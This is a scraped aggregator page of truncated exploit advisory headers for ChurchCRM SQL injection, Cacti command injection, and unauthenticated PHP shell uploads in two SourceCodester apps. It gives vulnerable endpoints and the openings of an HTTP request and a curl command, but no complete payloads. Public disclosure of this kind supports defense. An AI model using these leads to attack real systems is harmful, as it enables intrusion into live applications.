Latest Breaking News On - Vendor homepage - Page 1 : comparemela.com

ChurchCRM 4.5.4 SQL Injection - KizzMyAnthia.com

# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid
# Date: 03-05-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.4
# Tested on: Windows, Linux
# CVE: CVE-2023-29842
"""
The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.
This endpoint can be triggered through the

WordPress WP ERP 1.12.2 SQL Injection - KizzMyAnthia.com

Zoo Management System 1.0 Shell Upload - KizzMyAnthia.com

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11
## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.
POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117",

Clinic's Patient Management System 1.0 Shell Upload

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10
## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
curl -i -s -k -X

Cacti 1.2.24 Command Injection - KizzMyAnthia.com

# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
# Date: 2023-07-03
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/info/downloads
# Version: Cacti 1.2.24
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
# CVE: CVE-2023-39362
# Category: WebApps
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Vulnerability discovered and reported by:

© 2024 Vimarsana
